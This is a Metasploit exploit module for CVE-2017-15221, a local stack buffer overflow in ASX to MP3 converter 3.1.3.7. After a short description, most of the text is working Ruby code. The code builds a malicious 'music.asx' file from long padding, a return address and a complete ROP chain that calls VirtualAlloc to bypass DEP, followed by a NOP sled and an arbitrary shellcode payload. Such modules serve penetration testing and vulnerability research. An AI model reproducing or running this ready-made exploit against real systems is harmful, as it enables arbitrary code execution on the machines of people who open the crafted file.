This Metasploit module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7. By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC.
56c0508be45bebf5e6af39311de96c27##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
'Description' => %q{
This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
},
'License' => MSF_LICENSE,
'Author' =>
[
'Maxim Guslyaev', # EDB POC, Metasploit Module
],
'References' =>
[
[ 'CVE', '2017-15221' ],
[ 'EDB', '47468' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 Enterprise/10 Pro',
{
'Ret' => 0x1002D038 # RET
}
]
],
'Payload' =>
{
'BadChars' => "\x00\x09\x0a"
},
'Privileged' => false,
'DisclosureDate' => "Oct 06 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
])
end
def exploit
buf = "http://"
buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"
## Save allocation type (0x1000) in EDX
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x11111111].pack("V")
buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
buf += [0x1002D493].pack("V") # POP EDX # RETN
buf += [0xEEEEFEEF].pack("V")
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x41414141].pack("V")
## Save the address of VirtualAlloc() in ESI
buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
buf += [0x41414141].pack("V")
buf += [0x41414141].pack("V")
## Save the size of the block in EBX
buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
## Save the address of (# ADD ESP,8 # RETN) in EBP
buf += [0x10031c6c].pack("V") # POP EBP # RETN
buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
#buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
## Save memory protection code (0x40) in ECX
buf += [0x1002ca22].pack("V") # POP ECX # RETN
buf += [0xFFFFFFFF].pack("V")
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
## Save ROP-NOP in EDI
buf += [0x1002e346].pack("V") # POP EDI # RETN
buf += [0x1002D038].pack("V") # RETN
## Save NOPs in EAX
#buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
#buf += [0x90909090].pack("V") # nop
## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
buf += [0x1002E516].pack("V") # POP EAX # RETN
buf += [0xA4E2F275].pack("V")
buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
buf += [0x10040ce5].pack("V") # PUSH EAX # RETN
buf += "\x90" * 4
buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
buf += "\x90" * 20
buf += payload.encoded
file_create(buf)
end
end